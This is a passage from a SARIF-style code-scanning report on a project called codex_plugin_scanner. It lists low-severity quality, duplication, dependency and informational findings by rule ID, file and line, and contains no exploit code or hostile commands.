"src/codex_plugin_scanner/guard/store_resume.py"}, "region": {"startLine": 159}}}]}, {"ruleId": "COMP001", "level": "note", "message": {"text": "[COMP001] High cognitive complexity: Function `walk` has cognitive complexity 14 (SonarSource scale). Cognitive complexity measures how hard the function is for a human to understand \u2014 nested branches, boolean chains, and recursion all weigh in. 
Breakdown: elif=1, for=2, if=2, nested_bonus=6, recursion=2, ternary=1."}, "properties": {"repobilityId": 144996, "scanner": "repobility-threat-engine", "fingerprint": "7cb427ca5bc1c6565e37cd753bde581d7735e1dbb735f1313e68b67cf42e5964", "category": "quality", "severity": "low", "confidence": 0.95, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "AST-derived cognitive complexity score = 14 (severity threshold for low: 8+).", "evidence": {"scanner": "repobility-threat-engine", "function": "walk", "breakdown": {"if": 2, "for": 2, "elif": 1, "ternary": 1, "recursion": 2, "nested_bonus": 6}, "complexity": 14, "correlation_key": "fp|7cb427ca5bc1c6565e37cd753bde581d7735e1dbb735f1313e68b67cf42e5964"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/checks/claude.py"}, "region": {"startLine": 175}}}]}, {"ruleId": "COMP001", "level": "note", "message": {"text": "[COMP001] High cognitive complexity: Function `check_hooks_and_skills` has cognitive complexity 14 (SonarSource scale). Cognitive complexity measures how hard the function is for a human to understand \u2014 nested branches, boolean chains, and recursion all weigh in. 
Breakdown: continue=1, except=2, for=1, if=4, nested_bonus=5, ternary=1."}, "properties": {"repobilityId": 144995, "scanner": "repobility-threat-engine", "fingerprint": "1c404714fa52c6b2043d00abb287132ae1956ff397c31bbea842f708d03563c4", "category": "quality", "severity": "low", "confidence": 0.95, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "AST-derived cognitive complexity score = 14 (severity threshold for low: 8+).", "evidence": {"scanner": "repobility-threat-engine", "function": "check_hooks_and_skills", "breakdown": {"if": 4, "for": 1, "except": 2, "ternary": 1, "continue": 1, "nested_bonus": 5}, "complexity": 14, "correlation_key": "fp|1c404714fa52c6b2043d00abb287132ae1956ff397c31bbea842f708d03563c4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/checks/claude.py"}, "region": {"startLine": 221}}}]}, {"ruleId": "DEPCUR-NPM", "level": "note", "message": {"text": "npm package `tsx` is minor version(s) behind (^4.8.1 -> 4.22.4)"}, "properties": {"repobilityId": 144977, "scanner": "repobility-dependency-currency", "fingerprint": "be7c61c20601e193be4225ed902575f42ed26abdbd73272fd3998450c14f54d4", "category": "dependency", "severity": "low", "confidence": 0.9, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"gap": "minor version(s) behind", "signal": "currency", "cwe_ids": [], "package": "tsx", "scanner": "repobility-dependency-currency", "ecosystem": "npm", "languages": ["javascript"], "latest_version": "4.22.4", "correlation_key": "fp|be7c61c20601e193be4225ed902575f42ed26abdbd73272fd3998450c14f54d4", "current_version": "^4.8.1"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/package.json"}, "region": {"startLine": 1}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144872, "scanner": "repobility-ai-code-hygiene", 
"fingerprint": "9f814eada541e0f62f56b8f50427ff5c5f59f691d41a577e06a68ccd124c220b", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "tests/guard_python_phase12_support.py", "duplicate_line": 7, "correlation_key": "fp|9f814eada541e0f62f56b8f50427ff5c5f59f691d41a577e06a68ccd124c220b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/guard_tier2_phase13_support.py"}, "region": {"startLine": 7}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144871, "scanner": "repobility-ai-code-hygiene", "fingerprint": "d7534c7da1d0d6132c35f9d36b80342a2d5d3d0d3d73cd68be29e09f600af4a6", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/reporting.py", "duplicate_line": 183, "correlation_key": "fp|d7534c7da1d0d6132c35f9d36b80342a2d5d3d0d3d73cd68be29e09f600af4a6"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/verification.py"}, "region": {"startLine": 81}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144870, "scanner": "repobility-ai-code-hygiene", "fingerprint": "3d7f1cbe4762567a58c9fa28bd69344fe09d71e398c3a7865246a4c9693d5519", "category": "quality", "severity": "low", 
"confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/guard/runtime/skill_protection.py", "duplicate_line": 372, "correlation_key": "fp|3d7f1cbe4762567a58c9fa28bd69344fe09d71e398c3a7865246a4c9693d5519"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/supply_chain.py"}, "region": {"startLine": 417}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144869, "scanner": "repobility-ai-code-hygiene", "fingerprint": "ba80a1910d06e25bc2bc05a57082cc8c47537b7a39556250a9cb4bf9b4905789", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/guard/runtime/decisions.py", "duplicate_line": 194, "correlation_key": "fp|ba80a1910d06e25bc2bc05a57082cc8c47537b7a39556250a9cb4bf9b4905789"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/signals.py"}, "region": {"startLine": 200}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144868, "scanner": "repobility-ai-code-hygiene", "fingerprint": "d75046f64dd4baff596a388866d4f33fce7ba31fb098fc269ced4cda66b924b3", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", 
"isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "dashboard/src/guard-types.ts", "duplicate_line": 18, "correlation_key": "fp|d75046f64dd4baff596a388866d4f33fce7ba31fb098fc269ced4cda66b924b3"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/signals.py"}, "region": {"startLine": 8}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144867, "scanner": "repobility-ai-code-hygiene", "fingerprint": "10ec175e6757711694964a2a14f9557d72be43fcb764f010adf18730c1486725", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/guard/runtime/data_flow.py", "duplicate_line": 277, "correlation_key": "fp|10ec175e6757711694964a2a14f9557d72be43fcb764f010adf18730c1486725"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/shell_commands.py"}, "region": {"startLine": 123}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144866, "scanner": "repobility-ai-code-hygiene", "fingerprint": "5ccdaa7006e3f724ba372093855227d16370a2648ca36051d75e595233020305", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test 
files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "dashboard/src/guard-types.ts", "duplicate_line": 18, "correlation_key": "fp|5ccdaa7006e3f724ba372093855227d16370a2648ca36051d75e595233020305"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/detectors.py"}, "region": {"startLine": 37}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144865, "scanner": "repobility-ai-code-hygiene", "fingerprint": "ea8db5a55c8eaaba678e5b9e8bd94db3c7a04255df36d4fc36fe3718d378ddaa", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/guard/capabilities.py", "duplicate_line": 11, "correlation_key": "fp|ea8db5a55c8eaaba678e5b9e8bd94db3c7a04255df36d4fc36fe3718d378ddaa"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/risk.py"}, "region": {"startLine": 14}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144864, "scanner": "repobility-ai-code-hygiene", "fingerprint": "e63814fbe6c9050a9d9cd443b4c7bc6260baa97e5c68e098cc3fbe824d637418", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": 
["https://jscpd.dev/"], "duplicate_file": "dashboard/src/use-resolved-approval-gate.ts", "duplicate_line": 11, "correlation_key": "fp|e63814fbe6c9050a9d9cd443b4c7bc6260baa97e5c68e098cc3fbe824d637418"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/daemon/static/assets/chunks/use-resolved-approval-gate.js"}, "region": {"startLine": 51}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144863, "scanner": "repobility-ai-code-hygiene", "fingerprint": "7b8455abaefbb65670093af372ab7b7461ffc49848f8877e3379236ff5dcc71b", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "dashboard/src/use-focus-trap.ts", "duplicate_line": 30, "correlation_key": "fp|7b8455abaefbb65670093af372ab7b7461ffc49848f8877e3379236ff5dcc71b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/daemon/static/assets/chunks/use-focus-trap.js"}, "region": {"startLine": 30}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144862, "scanner": "repobility-ai-code-hygiene", "fingerprint": "d9bd3c0b3eef46c8e732b1b47bed3603f279746481b5201caff13ec565eb359f", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": 
"dashboard/src/runtime-overview.tsx", "duplicate_line": 78, "correlation_key": "fp|d9bd3c0b3eef46c8e732b1b47bed3603f279746481b5201caff13ec565eb359f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/daemon/static/assets/chunks/runtime-overview.js"}, "region": {"startLine": 3}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144861, "scanner": "repobility-ai-code-hygiene", "fingerprint": "2cd96e0b2bcf35b3bbf6969e1b825f4d583db5429959477534720c65f5b5820f", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "dashboard/src/audit-workspace.tsx", "duplicate_line": 78, "correlation_key": "fp|2cd96e0b2bcf35b3bbf6969e1b825f4d583db5429959477534720c65f5b5820f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/daemon/static/assets/chunks/audit-workspace.js"}, "region": {"startLine": 24}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144860, "scanner": "repobility-ai-code-hygiene", "fingerprint": "b35a120a6417077e0c1a0004732165f650d1c579dee55107236c4815a21fa655", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "dashboard/src/apps/app-catalog.ts", "duplicate_line": 125, 
"correlation_key": "fp|b35a120a6417077e0c1a0004732165f650d1c579dee55107236c4815a21fa655"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/daemon/static/assets/chunks/app-catalog.js"}, "region": {"startLine": 81}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144859, "scanner": "repobility-ai-code-hygiene", "fingerprint": "2a001f1986607bc9df69eae832b33507b74bf027dc118726de13edbd7958535b", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/guard/adapters/copilot.py", "duplicate_line": 719, "correlation_key": "fp|2a001f1986607bc9df69eae832b33507b74bf027dc118726de13edbd7958535b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/adapters/opencode.py"}, "region": {"startLine": 427}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144858, "scanner": "repobility-ai-code-hygiene", "fingerprint": "6fe0fcfd36aefe99446fb3310f8a4f29a85a642905b1fb948421a636b8c7233c", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/ecosystems/opencode.py", "duplicate_line": 18, "correlation_key": 
"fp|6fe0fcfd36aefe99446fb3310f8a4f29a85a642905b1fb948421a636b8c7233c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/adapters/openclaw_config.py"}, "region": {"startLine": 77}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144857, "scanner": "repobility-ai-code-hygiene", "fingerprint": "1c7a2e332ec63b26a9d999c5da4568dcda5eba5b4143e3ae8f693b7ba389e54b", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/guard/adapters/hermes.py", "duplicate_line": 213, "correlation_key": "fp|1c7a2e332ec63b26a9d999c5da4568dcda5eba5b4143e3ae8f693b7ba389e54b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/adapters/openclaw.py"}, "region": {"startLine": 58}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144856, "scanner": "repobility-ai-code-hygiene", "fingerprint": "88f0a69ad8437d4b86a8d0e936f6aefd83d15ee69268c1de4cf9eaa7fcd3090f", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/ecosystems/claude.py", "duplicate_line": 2, "correlation_key": "fp|88f0a69ad8437d4b86a8d0e936f6aefd83d15ee69268c1de4cf9eaa7fcd3090f"}}, 
"locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/ecosystems/opencode.py"}, "region": {"startLine": 2}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144855, "scanner": "repobility-ai-code-hygiene", "fingerprint": "95129ba7f4f3f36cb9abbc8e20b498eeae01ff73ccaf1b011b4b7373b988756a", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/ecosystems/claude.py", "duplicate_line": 2, "correlation_key": "fp|95129ba7f4f3f36cb9abbc8e20b498eeae01ff73ccaf1b011b4b7373b988756a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/ecosystems/gemini.py"}, "region": {"startLine": 2}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144854, "scanner": "repobility-ai-code-hygiene", "fingerprint": "8499d0e80404994f00c4ce1c5d105a171565b852959a9db11905855bf9381515", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "src/codex_plugin_scanner/ecosystems/claude.py", "duplicate_line": 2, "correlation_key": "fp|8499d0e80404994f00c4ce1c5d105a171565b852959a9db11905855bf9381515"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": 
"src/codex_plugin_scanner/ecosystems/codex.py"}, "region": {"startLine": 2}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144853, "scanner": "repobility-ai-code-hygiene", "fingerprint": "df81000a30e7712220cc2b3ef9840344fa5d457890f9e0d2ea91287c15e85c49", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "dashboard/src/history-analytics.tsx", "duplicate_line": 326, "correlation_key": "fp|df81000a30e7712220cc2b3ef9840344fa5d457890f9e0d2ea91287c15e85c49"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/history-charts.tsx"}, "region": {"startLine": 401}}}]}, {"ruleId": "AIC003", "level": "note", "message": {"text": "Duplicated implementation block across source files"}, "properties": {"repobilityId": 144852, "scanner": "repobility-ai-code-hygiene", "fingerprint": "899e523a79f506a56843fcd0371e1018a6d2005839439f8631ff7ac0f7af2ca8", "category": "quality", "severity": "low", "confidence": 0.86, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "A normalized source-code window appears in two different non-test files.", "evidence": {"lines": 12, "rule_id": "AIC003", "scanner": "repobility-ai-code-hygiene", "references": ["https://jscpd.dev/"], "duplicate_file": "dashboard/src/evidence/app-tab.tsx", "duplicate_line": 177, "correlation_key": "fp|899e523a79f506a56843fcd0371e1018a6d2005839439f8631ff7ac0f7af2ca8"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/evidence/category-tab.tsx"}, "region": {"startLine": 109}}}]}, {"ruleId": "MINED043", "level": "none", "message": {"text": 
"[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data."}, "properties": {"repobilityId": 145019, "scanner": "repobility-threat-engine", "fingerprint": "3b87f66ce34b26b5476f51a8962199e1cada9d172515b80f541b153b961d4e32", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "http-not-https", "owasp": "A02:2021", "cwe_ids": ["CWE-319"], "precision": 0.917, "promoted_at": "2026-05-18T14:01:32.347999+00:00", "triaged_in_corpus": 12, "observations_count": 4113831, "ai_coder_pattern_id": 15}, "scanner": "repobility-threat-engine", "correlation_key": "fp|3b87f66ce34b26b5476f51a8962199e1cada9d172515b80f541b153b961d4e32"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/models.py"}, "region": {"startLine": 219}}}]}, {"ruleId": "MINED067", "level": "none", "message": {"text": "[MINED067] Python Requests No Timeout: requests.get/post/etc. 
without timeout= can hang forever."}, "properties": {"repobilityId": 145016, "scanner": "repobility-threat-engine", "fingerprint": "41e325cca49ff01fc1cffaec68c4345a863a4de1823b6f7fa49d88130b2bb65b", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "python-requests-no-timeout", "owasp": null, "cwe_ids": ["CWE-400"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348058+00:00", "triaged_in_corpus": 12, "observations_count": 45429, "ai_coder_pattern_id": 122}, "scanner": "repobility-threat-engine", "correlation_key": "fp|41e325cca49ff01fc1cffaec68c4345a863a4de1823b6f7fa49d88130b2bb65b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/bridge/__init__.py"}, "region": {"startLine": 103}}}]}, {"ruleId": "SEC013", "level": "none", "message": {"text": "[SEC013] Path Traversal \u2014 User Input in File Path (and 2 more): Same pattern found in 2 additional files. Review if needed."}, "properties": {"repobilityId": 145013, "scanner": "repobility-threat-engine", "fingerprint": "cf0fa57966ff874fffc921a07cba5bdb97333460e3807666e7f68fe460b50691", "category": "path_traversal", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 2 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 2 additional occurrences found. 
The top occurrences remain visible as actionable findings.", "rule_id": "SEC013", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|cf0fa57966ff874fffc921a07cba5bdb97333460e3807666e7f68fe460b50691"}}}, {"ruleId": "MINED050", "level": "none", "message": {"text": "[MINED050] Stub Only Function (and 3 more): Same pattern found in 3 additional files. Review if needed."}, "properties": {"repobilityId": 145009, "scanner": "repobility-threat-engine", "fingerprint": "97e83b35d6d87ad95e23d12f8a95338efdb63b7f12c389b8e08fe5a80cf94e6e", "category": "quality", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 3 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"mined": true, "mining": {"slug": "stub-only-function", "owasp": null, "cwe_ids": ["CWE-1188"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348017+00:00", "triaged_in_corpus": 12, "observations_count": 633513, "ai_coder_pattern_id": 2}, "scanner": "repobility-threat-engine", "aggregated": true, "correlation_key": "fp|97e83b35d6d87ad95e23d12f8a95338efdb63b7f12c389b8e08fe5a80cf94e6e", "aggregated_count": 3}}}, {"ruleId": "MINED050", "level": "none", "message": {"text": "[MINED050] Stub Only Function: Function declared but body is just pass, return None, raise NotImplementedError, or TODO comment."}, "properties": {"repobilityId": 145008, "scanner": "repobility-threat-engine", "fingerprint": "7bf695b3d28870a17b7d1a369182a9cc8cba258bf7d96f74968e54bbfd1ffd07", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "stub-only-function", "owasp": null, "cwe_ids": ["CWE-1188"], "languages": ["python"], "precision": 1.0, 
"promoted_at": "2026-05-18T14:01:32.348017+00:00", "triaged_in_corpus": 12, "observations_count": 633513, "ai_coder_pattern_id": 2}, "scanner": "repobility-threat-engine", "correlation_key": "fp|7bf695b3d28870a17b7d1a369182a9cc8cba258bf7d96f74968e54bbfd1ffd07"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/ecosystems/gemini.py"}, "region": {"startLine": 29}}}]}, {"ruleId": "MINED050", "level": "none", "message": {"text": "[MINED050] Stub Only Function: Function declared but body is just pass, return None, raise NotImplementedError, or TODO comment."}, "properties": {"repobilityId": 145007, "scanner": "repobility-threat-engine", "fingerprint": "046b57a728c7aab60017a0097698356f12c230b1136e825bb18ba52eb7b94fba", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "stub-only-function", "owasp": null, "cwe_ids": ["CWE-1188"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348017+00:00", "triaged_in_corpus": 12, "observations_count": 633513, "ai_coder_pattern_id": 2}, "scanner": "repobility-threat-engine", "correlation_key": "fp|046b57a728c7aab60017a0097698356f12c230b1136e825bb18ba52eb7b94fba"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/ecosystems/codex.py"}, "region": {"startLine": 29}}}]}, {"ruleId": "MINED050", "level": "none", "message": {"text": "[MINED050] Stub Only Function: Function declared but body is just pass, return None, raise NotImplementedError, or TODO comment."}, "properties": {"repobilityId": 145006, "scanner": "repobility-threat-engine", "fingerprint": "5c592878872f29c7e201397397b083020d8504fc2888c4732796eba3ea3308d4", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": 
false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "stub-only-function", "owasp": null, "cwe_ids": ["CWE-1188"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348017+00:00", "triaged_in_corpus": 12, "observations_count": 633513, "ai_coder_pattern_id": 2}, "scanner": "repobility-threat-engine", "correlation_key": "fp|5c592878872f29c7e201397397b083020d8504fc2888c4732796eba3ea3308d4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/ecosystems/claude.py"}, "region": {"startLine": 29}}}]}, {"ruleId": "MINED001", "level": "none", "message": {"text": "[MINED001] Bare Except Pass (and 2 more): Same pattern found in 2 additional files. Review if needed."}, "properties": {"repobilityId": 145005, "scanner": "repobility-threat-engine", "fingerprint": "95cc9797c40c926759aaa04a4225f0a4ae4f9faafb543c58446c2f46cd9cfe9e", "category": "quality", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 2 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"mined": true, "mining": {"slug": "bare-except-pass", "owasp": null, "cwe_ids": ["CWE-755"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347744+00:00", "triaged_in_corpus": 15, "observations_count": 1550824, "ai_coder_pattern_id": 6}, "scanner": "repobility-threat-engine", "aggregated": true, "correlation_key": "fp|95cc9797c40c926759aaa04a4225f0a4ae4f9faafb543c58446c2f46cd9cfe9e", "aggregated_count": 2}}}, {"ruleId": "MINED062", "level": "none", "message": {"text": "[MINED062] Python Dataclass No Fields (and 19 more): Same pattern found in 19 additional files. 
